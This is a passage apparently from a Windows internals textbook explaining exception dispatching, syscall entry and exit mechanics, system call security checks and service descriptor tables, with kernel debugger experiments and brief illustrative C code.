[+0x2c4] WorkItemsProcessedLastPass : 1843485 [Type: unsigned long]
[+0x2c8] ThreadCount
: 5 [Type: long]
[+0x2cc (30: 0)] MinThreads
: 0 [Type: long]
[+0x2cc (31:31)] TryFailed
: 0 [Type: unsigned long]
[+0x2d0] MaxThreads
: 4096 [Type: long]
[+0x2d4] QueueIndex
: IoPoolUntrusted (1) [Type: _EXQUEUEINDEX]
[+0x2d8] AllThreadsExitedEvent : 0x0 [Type: _KEVENT *]
Exception dispatching
In contrast to interrupts, which can occur at any time, exceptions are conditions that result directly from
the execution of the program that is running. Windows uses a facility known as structured exception
handling, which allows applications to gain control when exceptions occur. The application can then fix the condition and return to the place the exception occurred, unwind the stack (thus terminating execution of the subroutine that raised the exception), or declare back to the system that the exception isn't recognized, so that the system continues searching for an exception handler that might process it.
This section assumes you're familiar with the basic concepts behind Windows structured exception handling; if you're not, the overview in the Windows SDK documentation or the relevant chapters of the book Windows via C/C++ (Microsoft Press) are good starting points. Keep in mind that although exception handling is made accessible through language extensions (for example, the __try construct in Microsoft Visual C++), it is a system mechanism and hence isn't language specific.

On x86 and x64 processors, all exceptions have predefined interrupt numbers that directly correspond to the entry in the IDT that points to the trap handler for a particular exception. Table 8-12 shows x86-defined exceptions and their assigned interrupt numbers. Because the first entries of the IDT are used for exceptions, hardware interrupts are assigned entries later in the table, as mentioned earlier.
All exceptions, except those simple enough to be resolved by the trap handler, are serviced by a kernel module called the exception dispatcher. The exception dispatcher's job is to find an exception handler that can dispose of the exception. Examples of architecture-independent exceptions that the kernel defines include memory-access violations, integer divide-by-zero, integer overflow, floating-point exceptions, and debugger breakpoints.

TABLE 8-12 x86 exceptions and their interrupt numbers

Interrupt Number   Exception                           Mnemonic
0                  Divide Error                        #DE
1                  Debug (Single Step)                 #DB
2                  Non-Maskable Interrupt (NMI)        -
3                  Breakpoint                          #BP
4                  Overflow                            #OF
5                  Bounds Check (Range Exceeded)       #BR
6                  Invalid Opcode                      #UD
7                  NPX Not Available                   #NM
8                  Double Fault                        #DF
9                  NPX Segment Overrun                 -
10                 Invalid Task State Segment (TSS)    #TS
11                 Segment Not Present                 #NP
12                 Stack-Segment Fault                 #SS
13                 General Protection                  #GP
14                 Page Fault                          #PF
15                 Intel Reserved                      -
16                 x87 Floating Point                  #MF
17                 Alignment Check                     #AC
18                 Machine Check                       #MC
19                 SIMD Floating Point                 #XM
20                 Virtualization Exception            #VE
21                 Control Protection (CET)            #CP

The kernel traps and handles some of these exceptions transparently to user programs. For example,
encountering a breakpoint while executing a program being debugged generates an exception, which
the kernel handles by calling the debugger. The kernel handles certain other exceptions by returning
an unsuccessful status code to the caller.
On 32-bit x86 systems, Windows uses frame-based exception handlers to deal with these exceptions. The term frame-based refers to an exception handler's association with a particular procedure activation. When a procedure is invoked, a stack frame representing that activation of the procedure is pushed onto the stack. A stack frame can have one or more exception handlers associated with it, each of which protects a particular block of code in the source program. When an exception occurs, the kernel searches for an exception handler associated with the current stack frame. If none exists, the kernel searches for an exception handler associated with the previous stack frame, and so on, until it finds one. If no handler is found, the kernel calls its own default exception handlers.

For 64-bit and ARM applications, structured exception handling does not use frame-based handlers (the frame-based technology has been proven to be attackable by malicious users). Instead, a table of handlers for each function is built into the image during compilation. The kernel looks for handlers associated with each function and generally follows the same algorithm we described for 32-bit code.
Structured exception handling is heavily used within the kernel itself so that it can safely verify
whether pointers from user mode can be safely accessed for read or write access. Drivers can make
use of this same technique when dealing with pointers sent during I/O control codes (IOCTLs).
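The frame-based search described above can be modeled as a walk up a chain of frames, each optionally carrying a handler. The types below are illustrative only—real SEH involves registration records, unwind tables, and filter semantics far beyond this sketch:

```c
#include <assert.h>
#include <stddef.h>

/* A handler returns nonzero if it disposes of the given exception code. */
typedef int (*exception_handler_t)(int exception_code);

typedef struct stack_frame {
    exception_handler_t handler;   /* NULL if this frame has none */
    struct stack_frame *previous;  /* the caller's frame */
} stack_frame_t;

/* Walk outward from the current frame, returning the first frame whose
 * handler disposes of the exception, or NULL if none does (at which point
 * the system's default handlers would take over). */
static stack_frame_t *find_handler(stack_frame_t *current, int code)
{
    for (stack_frame_t *f = current; f != NULL; f = f->previous) {
        if (f->handler && f->handler(code))
            return f;
    }
    return NULL;
}

/* Sample handler that accepts any exception, for demonstration. */
static int handles_everything(int code) { (void)code; return 1; }
```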
Another mechanism of exception handling is called vectored exception handling. This method can be used only by user-mode applications; more information about it is available on Microsoft Docs at https://docs.microsoft.com/en-us/windows/win32/debug/vectored-exception-handling.
When an exception occurs, whether it is explicitly raised by software or implicitly raised by hard-
ware, a chain of events begins in the kernel. The CPU hardware transfers control to the kernel trap
handler, which creates a trap frame (as it does when an interrupt occurs). The trap frame allows the
system to resume where it left off if the exception is resolved. The trap handler also creates an excep-
tion record that contains the reason for the exception and other pertinent information.
If the exception occurred in kernel mode, the exception dispatcher simply calls a routine to locate a frame-based exception handler that will handle the exception. Because unhandled kernel-mode exceptions are considered fatal operating system errors, you can assume that the dispatcher always finds an exception handler. Some traps, however, do not lead into an exception handler because the kernel always assumes such errors to be fatal; these are errors that could have been caused only by severe bugs in the internal kernel code or by major inconsistencies in driver code. Such fatal errors will result in a bug check with the UNEXPECTED_KERNEL_MODE_TRAP code.
If the exception occurred in user mode, the exception dispatcher does something more elaborate. The Windows subsystem has a debugger port (this is actually a debugger object, which will be discussed later) to receive notification of user-mode exceptions in Windows processes. (In this case, by "port" we mean an ALPC port object, which will be discussed later in this chapter.) Also, the process in which the exception occurred may have a debugger process attached to it. The first action the exception dispatcher takes is to see whether the process that incurred the exception has an associated debugger
process. If it does, the exception dispatcher sends a debugger object message to the debug object associ-
ated with the process (which internally the system refers to as a “port” for compatibility with programs
that might rely on behavior in Windows 2000, which used an LPC port instead of a debug object).
FIGURE 8-24 Dispatching an exception. (The diagram shows the trap handler building an exception record and calling the exception dispatcher, which—through function calls and ALPC—can involve the debugger port (first and second chance), frame-based handlers, the environment subsystem's exception port, the Windows Error Reporting error port, and finally the kernel default handler.)
If the process has no debugger process attached or if the debugger doesn't handle the exception, the exception dispatcher switches into user mode, copies the trap frame to the user stack formatted as a CONTEXT data structure (documented in the Windows SDK), and calls a routine to find a structured or vectored exception handler. If none is found or if none handles the exception, the exception dispatcher switches back into kernel mode and calls the debugger again to allow the user to do more debugging. (This is called the second-chance notification.)
If the debugger isn't running and no user-mode exception handlers are found, the kernel sends a message to the exception port associated with the thread's process. This exception port, if one exists, was registered by the environment subsystem that controls this thread. The exception port gives the environment subsystem, which presumably is listening at the port, the opportunity to translate the exception into an environment-specific signal or exception. If the kernel progresses this far in processing the exception and the subsystem doesn't handle it, the kernel sends a message to a systemwide error port that Csrss (Client/Server Run-Time Subsystem) uses for Windows Error Reporting (WER)—which is discussed in Chapter 10—and executes a default exception handler that simply terminates the process whose thread caused the exception.
Unhandled exceptions
All Windows threads have an exception handler that processes unhandled exceptions. This exception handler is declared in the internal Windows start-of-thread function. The start-of-thread function runs when a user creates a process or any additional threads. It calls the environment-supplied thread start routine specified in the initial thread context structure, which in turn calls the user-supplied startup routine specified in the CreateThread call.
The generic code for the internal start-of-thread functions is shown here:
VOID RtlUserThreadStart(VOID)
{
LPVOID StartAddress = RCX; // Located in the initial thread context structure
LPVOID Argument = RDX; // Located in the initial thread context structure
LPVOID Win32StartAddr;
if (Kernel32ThreadInitThunkFunction != NULL) {
Win32StartAddr = Kernel32ThreadInitThunkFunction;
} else {
Win32StartAddr = StartAddress;
}
__try
{
DWORD ThreadExitCode = Win32StartAddr(Argument);
RtlExitUserThread(ThreadExitCode);
}
__except(RtlpGetExceptionFilter(GetExceptionInformation()))
{
NtTerminateProcess(NtCurrentProcess(), GetExceptionCode());
}
}
EXPERIMENT: Viewing the real user start address for Windows threads
The fact that each Windows thread begins execution in a system-supplied function (and not
the user-supplied function) explains why the start address for thread 0 is the same for every
Windows process in the system (and why the start addresses for secondary threads are also the
same). To see the user-supplied function address, use Process Explorer or the kernel debugger.
Because most threads in Windows processes start at one of the system-supplied wrapper
functions, Process Explorer, when displaying the start address of threads in a process, skips the
initial call frame that represents the wrapper function and instead shows the second frame on the stack as the start address.
Process Explorer does display the complete call hierarchy when it displays the call stack.
Notice the following results when the Stack button is clicked:
The first frame is the start of the internal thread wrapper, and the next frame is the environment subsystem's thread wrapper—in this case, kernel32, because you are dealing with a Windows subsystem application. The third frame (line 18) is the main entry point into Notepad.exe. If symbols aren't resolved properly, use the Configure Symbols menu item located in the Options menu.
System service handling

The kernel's trap handlers dispatch interrupts, exceptions, and system service calls. In the preceding sections, you saw how interrupt and exception handling work; in this section, you'll learn about system services (see Figure 8-25). A system service dispatch is triggered as a result of executing an instruction assigned to system service dispatching. The instruction that Windows uses for system service dispatching depends on the processor on which it is executing and whether certain security features are enabled, as you'll see shortly.
FIGURE 8-25 System service dispatching. (The diagram shows a user-mode system service call transitioning into kernel mode, where the system service dispatcher indexes the system service dispatch table—entries 0 through n—to invoke the corresponding system service.)
Architectural system service dispatching
On most x64 systems, Windows uses the syscall instruction, which results in the change of some of the
key processor state we have learned about in this chapter, based on certain preprogrammed model
specific registers (MSRs):
■ 0xC0000081, known as STAR (SYSCALL Target Address Register)

■ 0xC0000082, known as LSTAR (Long-Mode STAR)

■ 0xC0000084, known as SFMASK (SYSCALL Flags Mask)
Upon encountering the syscall instruction, the processor acts in the following manner:

■ The Code Segment (CS) is loaded from bits 32 to 47 in STAR, which Windows sets to 0x0010 (KGDT64_R0_CODE).

■ The Stack Segment (SS) is loaded from bits 32 to 47 in STAR plus 8, which gives us 0x0018 (KGDT64_R0_DATA).

■ The Instruction Pointer (RIP) is saved in RCX, and the new value is loaded from LSTAR, which Windows sets to KiSystemCall64 if the Meltdown (KVA Shadowing) mitigation is not needed, or KiSystemCall64Shadow otherwise. (More information on the Meltdown vulnerability was provided in the "Hardware side-channel vulnerabilities" section earlier in this chapter.)

■ The current processor flags (RFLAGS) are saved in R11 and then masked with SFMASK, which Windows sets to 0x4700 (trap flag, direction flag, interrupt flag, and nested task flag).

■ The Stack Pointer (RSP) and all other segments (DS, ES, FS, and GS) are kept to their current user-space values.
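The segment-selector arithmetic in the first two steps can be checked with a couple of helper functions. The STAR value below is a constructed example that matches the selectors Windows programs (kernel CS = 0x0010, hence SS = 0x0018):

```c
#include <assert.h>
#include <stdint.h>

/* Extract the kernel CS selector from bits 32-47 of the STAR MSR value. */
static uint16_t star_kernel_cs(uint64_t star)
{
    return (uint16_t)(star >> 32);
}

/* On syscall, SS is the STAR-derived selector plus 8 (the next GDT slot). */
static uint16_t star_kernel_ss(uint64_t star)
{
    return (uint16_t)((star >> 32) + 8);
}
```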
Therefore, although the instruction executes in very few processor cycles, it does leave the processor in an
insecure and unstable state—the user-mode stack pointer is still loaded, GS is still pointing to the TEB, but
the Ring Level, or CPL, is now 0, enabling kernel mode privileges. Windows acts quickly to place the processor in a correct state. Outside of the KVA shadow-specific operations that might happen on legacy processors, these are the precise steps that KiSystemCall64 must perform:
1. By using the swapgs instruction, GS now points to the PCR, as described earlier in this chapter.

2. The current stack pointer (RSP) is saved into the UserRsp field of the PCR. Because GS has now correctly been loaded, this can be done without using any stack or register.

3. The new stack pointer is loaded from the RspBase field of the PRCB (recall that this structure is stored as part of the PCR).

Now that the kernel stack is loaded, the function builds a trap frame, using the format described earlier in the chapter. This includes storing in the frame the SegSs set to KGDT_R3_DATA (0x2B), Rsp from the UserRsp in the PCR, EFlags from R11, SegCs set to KGDT_R3_CODE (0x33), and storing Rip from RCX—a direct consequence of how syscall operates.
Recall that the x64 ABI dictates that the first argument of a function (in this case, a syscall) be placed in RCX—yet the syscall instruction overrides RCX with the instruction pointer of the caller, as shown earlier. Windows is aware of this behavior and copies RCX into R10 before issuing the syscall instruction, as you'll soon see.
The next steps have to do with processor mitigations such as Supervisor Mode Access Prevention
(SMAP)—such as issuing the stac instruction—and the myriad processor side-channel mitigations, such
as clearing the branch tracing buffers (BTB) or return store buffer (RSB). Additionally, on processors supporting the CET shadow stack feature, the shadow stack of the thread must also be synchronized correctly. Beyond this point, additional elements of the trap frame are stored, such as various
nonvolatile registers and debug registers, and the nonarchitectural handling of the system call begins,
which we discuss in more detail in just a bit.
On x86 processors, a different instruction is used, which is called sysenter. Because this is a legacy 32-bit instruction, we won't spend too much time digging into this instruction other than mentioning that its behavior is similar—a
certain amount of processor state is loaded from various MSRs, and the kernel does some additional
work, such as setting up the trap frame. More details can be found in the relevant Intel processor
manuals. Similarly, ARM-based processors use the svc instruction, which has its own behavior and OS-
level handling, but these systems still represent only a small minority of Windows installations.
There is one more corner case that Windows must handle: processors without Mode Base Execution Controls (MBEC) operating while Hypervisor Code Integrity (HVCI) is enabled suffer from a design issue that violates the promises HVCI provides. (Chapter 9 covers HVCI and MBEC.) Namely, an attacker could allocate user-space executable memory, which HVCI allows (by marking the respective SLAT entry as executable), and then manipulate the page tables to make the virtual address appear as a kernel page. Because the MMU would see the page as being kernel, Supervisor Mode Execution Prevention (SMEP) would not prohibit execution of the code, and because the backing physical page was legitimately marked executable in the SLAT, the hypervisor would not prohibit it either. The attacker has now achieved arbitrary kernel-mode code execution, violating the basic tenet of HVCI.

MBEC and its related technologies fix this issue by introducing distinct kernel versus user executable bits in the SLAT entry data structures, allowing the hypervisor (or the Secure Kernel) to mark user pages as kernel non executable but user executable. Unfortunately, on processors without this capability, the hypervisor has no choice but to trap all
code privilege level changes and swap between two different sets of SLAT entries—ones marking all
user physical pages as nonexecutable, and ones marking them as executable. The hypervisor traps CPL
changes by making the IDT appear empty (effectively setting its limit to 0) and decoding the underly-
ing instruction, which is an expensive operation. However, as interrupts can directly be trapped by the
hypervisor, avoiding these costs, the system call dispatch code in user space prefers issuing an interrupt
if it detects an HVCI-enabled system without MBEC-like capabilities. The SystemCall bit in the Shared
User Data structure described in Chapter 4, Part 1, is what determines this situation.
Therefore, when SystemCall is set to 1, x64 Windows uses the int 0x2e instruction, which results in a
trap, including a fully built-out trap frame that does not require OS involvement. Interestingly, this
happens to be the same instruction that was used on ancient x86 processors prior to the Pentium Pro,
94
CHAPTER 8 System mechanisms
and continues to be supported on x86 systems for backward compatibility with three-decade-old
software that had unfortunately hardcoded this behavior. On x64, however, int 0x2e can be used only
in the scenario just described, when SystemCall is set to 1.
Regardless of which instruction is ultimately used, the user-mode system call dispatching code always
stores a system call index in a register—EAX on x86 and x64, R12 on 32-bit ARM, and X8 on ARM64—
which will be described in more detail shortly. Additionally, to
make things easy, the standard function call processor ABI (application binary interface) is maintained
across the boundary—for example, arguments are placed on the stack on x86, and in RCX (technically R10
due to the behavior of the syscall instruction) on x64.
For system calls that occurred through int 0x2e, the iret instruction restores the processor state based on the
hardware trap frame. For syscall and sysenter, though, the processor once again leverages
the MSRs and hardcoded registers we saw on entry, through specialized instructions called sysret and
sysexit, respectively. Here's how the former behaves:
■ The Stack Segment (SS) is loaded from bits 48 to 63 in STAR, which Windows sets to 0x0023
(KGDT_R3_DATA).
■ The Code Segment (CS) is loaded from bits 48 to 63 in STAR plus 0x10, which gives us 0x0033
(KGDT64_R3_CODE).
■ The Instruction Pointer (RIP) is loaded from RCX.
■ The processor flags (RFLAGS) are loaded from R11.
■ The Stack Pointer (RSP), as well as all the other segments, keep their current
kernel-space values.
Therefore, just like for system call entry, the exit mechanics must also clean up some processor state.
Namely, RSP is restored to the Rsp field that was saved in the trap frame by
the entry code we analyzed, similar to all the other saved registers. The RCX register is loaded from the
saved Rip, R11 is loaded from EFlags, and the swapgs instruction is used right before issuing the sysret
instruction. The remaining registers are likewise restored from the trap frame before the sysret
instruction is issued. Equivalent actions are taken for sysexit and
ARM64's exit instruction (eret). Additionally, if CET is enabled, just like in the entry path, the shadow
stack must correctly be synchronized on the exit path.
EXPERIMENT: Locating the system service dispatcher
As mentioned, x64 system calls occur based on a series of MSRs, which you can explore with the rdmsr
debugger command. First, take note of STAR (0xC0000081), which encodes KGDT_R0_CODE (0x0010)
and KGDT64_R3_DATA (0x0023):
lkd> rdmsr c0000081
msr[c0000081] = 00230010`00000000
Next, you can investigate LSTAR, and then use the ln command to see whether it points to
KiSystemCall64 (for systems that don't require KVA shadowing) or KiSystemCall64Shadow (for
those that do):
lkd> rdmsr c0000082
msr[c0000082] = fffff804`7ebd3740
lkd> ln fffff804`7ebd3740
(fffff804`7ebd3740) nt!KiSystemCall64
You can also see SFMASK (0xC0000084), which holds the RFLAGS bits that the processor clears on
syscall entry:
lkd> rdmsr c0000084
msr[c0000084] = 00000000`00004700
x86 system calls occur through sysenter, which uses a different set of MSRs, including 0x176,
which stores the 32-bit system call handler:
lkd> rdmsr 176
msr[176] = 00000000'8208c9c0
lkd> ln 00000000'8208c9c0
(8208c9c0) nt!KiFastCallEntry
Finally, you can see the int 0x2e handler registered in the IDT with the !idt 2e debugger command:
lkd> !idt 2e
Dumping IDT: fffff8047af03000
2e:
fffff8047ebd3040 nt!KiSystemService
You can disassemble the KiSystemService or KiSystemCall64 routine with the u command. For the
interrupt handler, you'll notice that it eventually jumps into KiSystemServiceUser:
nt!KiSystemService+0x227:
fffff804`7ebd3267 4883c408 add rsp,8
fffff804`7ebd326b 0faee8 lfence
fffff804`7ebd326e 65c604255308000000 mov byte ptr gs:[853h],0
fffff804`7ebd3277 e904070000 jmp nt!KiSystemServiceUser (fffff804`7ebd3980)
while the MSR handler falls through into it directly:
nt!KiSystemCall64+0x227:
fffff804`7ebd3970 4883c408 add rsp,8
fffff804`7ebd3974 0faee8 lfence
fffff804`7ebd3977 65c604255308000000 mov byte ptr gs:[853h],0
nt!KiSystemServiceUser:
fffff804`7ebd3980 c645ab02 mov byte ptr [rbp-55h],2
This shows you that eventually both code paths arrive in KiSystemServiceUser, which then performs
the actions common to all processors, as discussed in the next section.
Nonarchitectural system service dispatching
The kernel uses the system call number to locate the system service informa-
tion in the system service dispatch table. On x86 systems, this table is like the interrupt dispatch table
described earlier in the chapter except that each entry contains a pointer to a system service rather
than to an interrupt-handling routine. On other platforms, including 32-bit ARM and ARM64, the table
is implemented slightly differently; instead of containing pointers to the system service, it contains
offsets relative to the table itself. This addressing mechanism is more suited to the x64 and ARM64
application binary interface (ABI) and instruction-encoding format, and the RISC nature of ARM pro-
cessors in general.
Note System service numbers frequently change between OS releases. Not only does
Microsoft occasionally add or remove system services, but the table is also often random-
ized and shuffled to break attacks that rely on hardcoded system call numbers.
Regardless of architecture, the system service dispatcher performs a few common actions on
all platforms:
■ Save additional registers in the trap frame, such as the debug registers and the
floating-point registers.
■ If this thread belongs to a pico process, forward to the system call pico provider routine
(see Chapter 3, Part 1, for more information on pico providers).
■ If this thread is a UMS scheduled thread, call KiUmsCallEntry to synchronize with the pri-
mary thread; for UMS primary threads, the UmsPerformingSyscall flag is set in the thread object.
■ Save the first argument of the system call in the FirstArgument field of the thread object and
the system call number in SystemCallNumber.
■ Call the shared user/kernel system call handler (KiSystemServiceStart), which sets the TrapFrame
field of the thread object to the current stack pointer where it is stored.
■ Enable interrupt delivery.
At this point, the thread is officially undergoing a system call, and its state is fully consistent and
can be interrupted. The next step is to select the correct system call table and potentially upgrade the
thread to a GUI thread, details of which will be based on the GuiThread and RestrictedGuiThread
fields and which will be described in the "Service descriptor tables" section later in this chapter. Following
that, GDI batching operations are flushed for GUI threads based on the GdiBatchCount field, and the
arguments of the system call are copied from the user stack onto the kernel
stack. This is needed to avoid having each system call manually copy the arguments (which would
require assembly code and exception handling) and to ensure that the user can't change the arguments
as the kernel is accessing them. This operation is done within a special code block that is recognized
by the exception handlers as being associated to user stack copying, ensuring that the kernel does not
crash in the case that an attacker, or incorrectly written program, is messing with the user stack. Since
system calls can take an arbitrary number of arguments (well, almost), you see in the next section how
the kernel knows how many to copy.
Note that this argument copying is shallow: If any of the arguments passed to a system service
points to a buffer in user space, it must be probed for safe accessibility before kernel-mode code can
read and/or write from it. If the buffer will be accessed multiple times, it may also need to be captured,
or copied, into a local kernel buffer. The responsibility of this probe and capture operation lies with each
individual system call and is not performed by the handler. However, one of the key operations that the
system call dispatcher must perform is to set the previous mode of the thread. This value corresponds
to either KernelMode or UserMode and must be synchronized whenever the current thread executes
a trap, identifying the privilege level of the incoming exception, trap, or system call. This will allow the
system call, using ExGetPreviousMode, to correctly handle user versus kernel callers.
If DTrace is configured and
system call tracing is enabled, the appropriate entry/exit callbacks are called around the system call.
Alternatively, if ETW tracing is enabled but not DTrace, the appropriate ETW events are logged around
the system call; if neither is enabled, the system call proceeds with no additional logic. The last step
is to increment the KeSystemCalls variable in the PRCB, which
is exposed as a performance counter that you can track in the Performance & Reliability Monitor.
At this point, system call dispatching is complete, and the opposite steps will then be taken as part
of system call exit. These steps will restore and copy user-mode state as appropriate, handle user-mode
APC delivery as needed, address side-channel mitigations around various architectural buffers, and
eventually return with one of the CPU instructions relevant for this platform.
Kernel-issued system call dispatching
Because system calls can be performed by kernel-mode code as well as by user-mode code, if the
kernel simply invoked the Nt functions directly, any pointers, handles, and behaviors would be treated
as if coming from user mode—which is clearly not correct.
To solve this, the kernel exports specialized Zw versions of these calls—that is, instead of
NtCreateFile, the kernel exports ZwCreateFile. Additionally, because Zw functions must be manually
exported by the kernel, only the ones that Microsoft wishes to expose for third-party use are present.
For example, ZwCreateUserProcess is not exported by name because kernel drivers are not expected to
launch user applications. These exported APIs are not actually simple aliases or wrappers around the Nt
versions. Instead, they are “trampolines” to the appropriate Nt system call, which use the same system
call-dispatching mechanism.
Like KiSystemCall64 does, they too build a fake hardware trap frame (pushing on the stack the
data that the CPU would generate after an interrupt coming from kernel mode), and they also disable
interrupts, just like a trap would. On x64 systems, for example, the KGDT64_R0_CODE (0x0010) selec-
tor is pushed as CS, and the current kernel stack as RSP. Each of the trampolines places the system call
number in the appropriate register (for example, EAX on x86 and x64), and then calls KiServiceInternal,
which saves additional data in the trap frame, reads the current previous mode, stores it in the trap
frame, and then sets the previous mode to KernelMode (this is an important difference).
User-issued system call dispatching
As was already introduced in Chapter 1 of Part 1, the system service dispatch instructions for Windows
executive services exist in the system library Ntdll.dll. Subsystem DLLs call functions in Ntdll to
implement their documented functions. The exception is Windows USER and GDI functions, includ-
ing DirectX kernel graphics functions, whose system service dispatch instructions are implemented in
Win32u.dll instead. Figure 8-26 illustrates how the Windows WriteFile function invokes the NtWriteFile
system service: the application calls WriteFile in Kernelbase.dll (possibly through an API Set redirection;
see Chapter 3, Part 1, for more information on API redirection), which in turn calls the
NtWriteFile function in Ntdll.dll, which in turn executes the appropriate instruction to cause a system
service trap, passing the system service number representing NtWriteFile.
The system service dispatcher in Ntoskrnl.exe (in this example, KiSystemService) then calls the real
NtWriteFile in Ntoskrnl.exe to process the request. For Windows USER, GDI, and DirectX func-
tions, the system service dispatch calls the function in the loadable kernel-mode part of the Windows
subsystem: either Win32kbase.sys or Win32kfull.sys on Desktop systems, Win32kmin.sys on Windows 10X systems,
or Dxgkrnl.sys if this was a DirectX call.
[Figure 8-26 depicts both paths: a WriteFile call flows from the Windows application through WriteFile in Kernelbase.dll and NtWriteFile in Ntdll.dll (software trap) to KiSystemService in Ntoskrnl.exe and then NtWriteFile in Ntoskrnl.exe, while a BitBlt call flows through Gdi32.dll or User32.dll and NtGdiBitBlt in Win32u.dll (software trap) to KiSystemService and, if not filtered, to NtGdiBitBlt in Win32kfull.sys.]
FIGURE 8-26 System service dispatching.
System call security
Since the kernel has the mechanisms that it needs for correctly synchronizing the previous mode for
system call operations, each system call service can rely on this value as part of processing. We previ-
ously mentioned that when the previous mode is UserMode and the system call accepts a pointer to a
buffer of any sort, the kernel must probe it. By probe, we mean the following:
1.
Making sure that the address is below MmUserProbeAddress, which lies near the top of the
user-mode address space.
2.
Making sure that the address is aligned to a boundary matching how the caller intends to access
its data—for example, 2 bytes for Unicode characters, 8 bytes for a 64-bit pointer, and so on.
3.
If the buffer is meant to be used for output, making sure that, at the time the system call begins,
it is actually writable.
Note that output buffers could become invalid or read-only at any future point in time, and the
system call must always access them using SEH, which we described earlier in this chapter, to avoid
crashing the kernel. Similarly, although input buffers are not explicitly checked for readability, because
they will likely be imminently used anyway, SEH must be used to ensure they can be safely read. SEH
does not guard against alignment mismatches or stray kernel addresses, however, so the probing steps
must still be taken.
These probe and SEH rules apply to UserMode calls, and all buffers should be accessed under SEH in
that case. Probing is not the only type of validation
that a system call must perform, however, because some other dangerous situations can arise:
■ The caller may have supplied a handle to an object. The kernel normally bypasses all security
access checks when referencing objects, and it also has full access to kernel handles (which we
describe later in the “Object Manager” section of this chapter), whereas user-mode code does
not. The previous mode is used to inform the Object Manager that it should still perform access
checks because the request came from user space.
■ Sometimes, the opposite is needed: flags such as OBJ_FORCE_ACCESS_CHECK need
to be used by a driver to indicate that even though it is using the Zw API, which sets the previ-
ous mode to KernelMode, the Object Manager should still treat the request as if coming from
UserMode.
■ Similarly, a driver performing file operations on behalf of a user-mode request should use the
IO_FORCE_ACCESS_CHECKING flag, because calling a routine such as ZwCreateFile
would change the previous mode to KernelMode and bypass access checks. Potentially, a driver
might also need this when servicing an IRP that originated in user mode.
■ File-system access is also subject to
redirection attacks, where privileged kernel-mode code might be incorrectly using various
user-controlled symbolic links and reparse points.
■ Finally, any driver that performs operations on behalf of a user-mode caller
with the Zw interface must keep in mind that this will reset the previous mode to KernelMode
and respond accordingly.
Service descriptor tables
We previously mentioned that before performing a system call, the user-mode or kernel-mode tram-
polines first place a system call number in a processor register. This number is technically composed of
two elements, which are shown in Figure 8-27. The first, stored in
the bottom 12 bits, represents the system call index. The second, which uses the next higher 2 bits (12-
13), is the table identifier. This allows the kernel to implement up to four different
types of system services, each stored in a table that can house up to 4096 system calls.
[Figure 8-27 shows the layout of a 32-bit system service number: bits 0-11 form the index into the table, bits 12-13 select the table, and the remaining bits are unused. Table index 0 selects the Native API (KeServiceDescriptorTable), while table index 1 selects the Native API plus the Win32k.sys API (KeServiceDescriptorTableShadow).]
FIGURE 8-27 System service number to system service translation.
The kernel keeps track of the system service tables using three possible arrays—KeServiceDescriptor
Table, KeServiceDescriptorTableShadow, and KeServiceDescriptorTableFilter. Each of these arrays can
have up to two entries, which store the following three pieces of data:
I
A pointer to the array of system calls implemented by this service table
I
The number of system calls present in this service table, called the limit
I
A pointer to the array of argument bytes for each of the system calls in this service table
The first array, KeServiceDescriptorTable, has a single populated entry, which points to
KiServiceTable and KiArgumentTable, with a
little over 450 system calls (the precise number depends on your version of Windows). All threads, by
default, issue system calls that only access this table. On x86, this is enforced by the ServiceTable pointer
in the thread object, while all other platforms hardcode the symbol KeServiceDescriptorTable in the
system call dispatcher.
When a thread issues its first GUI system call, the kernel calls PsConvertToGuiThread and marks
the thread with either the GuiThread or the RestrictedGuiThread flag; which
one is used depends on whether the EnableFilteredWin32kSystemCalls process mitigation option is
enabled, which we described in the "Process-mitigation policies" section of Chapter 7, Part 1. On x86
systems, the thread's ServiceTable pointer now changes to KeServiceDescriptorTableShadow or
KeServiceDescriptorTableFilter, while on all other platforms, it is a
hardcoded symbol chosen at each system call. (Although less performant, the latter avoids an obvious
hooking point for malicious software to abuse.)
As you can probably guess, these other arrays include a second entry, which represents the
Windows USER and GDI services implemented in the kernel-mode part of the Windows subsystem,
albeit these still transit through Win32k.sys initially. This second entry points to W32pServiceTable or
W32pServiceTableFilter and W32pArgumentTable or W32pArgumentTableFilter, respectively, and has
about 1250 system calls or more, depending on your version of Windows.
Note Because the kernel does not link against Win32k.sys, it exports a
KeAddSystemServiceTable function that allows the addition of an additional entry into
the KeServiceDescriptorTableShadow and the KeServiceDescriptorTableFilter tables if they have
not already been filled in. Win32k.sys calls this function when it loads,
and PatchGuard protects the arrays once this function has been called, so that the structures
effectively become read only.
The only material difference between the Filter entries is that they point to system calls in Win32k.sys
with names like stub_UserGetThreadState, while the real array points to NtUserGetThreadState. The for-
mer stubs check whether the call is permitted by the filter set applied to the process and either fail the
request, returning STATUS_INVALID_SYSTEM_SERVICE, or forward it to the real system call
(such as NtUserGetThreadState), with potential telemetry if auditing is enabled.
The argument tables, on the other hand, are what help the kernel to know how many stack bytes need
to be copied from the user stack into the kernel stack, as explained in the dispatching section earlier.
Each entry in the argument table corresponds to the matching system call with that index and stores
the count of bytes to copy (up to 255). However, kernels for platforms other than x86 employ a mecha-
nism called system call table compaction, which combines the system call pointer from the call table
with the byte count from the argument table into a single value. The feature works as follows:
1.
Take the system call function pointer and compute the 32-bit difference from the beginning of
the system call table itself. Because the tables are global variables inside of the same module
that contains the functions, this range of ±2 GB should be more than enough.
2.
Take the stack byte count from the argument table and divide it by 4, converting it into an
argument count (arguments larger than 4 bytes, such as 8-byte ones, will
simply be considered as two "arguments").
3.
Shift the 32-bit difference from step 1 left by 4 bits, and use a bit-
wise or operation to add the argument count from the second step.
4.
Override the system call function pointer with the value obtained in step 3.
This scheme avoids storing absolute
pointers, and it acts as a layer of obfuscation, which makes it harder to hook or patch the
system call table while making it easier for PatchGuard to defend it.
EXPERIMENT: Mapping system call numbers to functions and arguments
You can duplicate the same lookup performed by the kernel when dealing with a system call index.
On an x86 system, you can just ask the debugger to dump each system call table, such as
KiServiceTable with the dps command, which stands for dump pointer symbol, which will actually
perform a lookup for you. You can then similarly dump the KiArgumentTable (or any of the
Win32k.sys ones) with the db command or dump bytes.
A more interesting exercise, however, is dumping this data on an ARM64 or x64 system, due
to the encoding we described earlier. The following steps will help you do that.
1.
Decode an entry—for example, entry 3, which on this system corresponds to
NtMapUserPhysicalPagesScatter:
lkd> ?? ((ULONG)(nt!KiServiceTable[3]) >> 4) + (int64)nt!KiServiceTable
unsigned int64 0xfffff803`1213e030
lkd> ln 0xfffff803`1213e030
(fffff803`1213e030) nt!NtMapUserPhysicalPagesScatter
2.
You can see the number of stack-based 4-byte arguments this system call takes by
taking the 4-bit argument count:
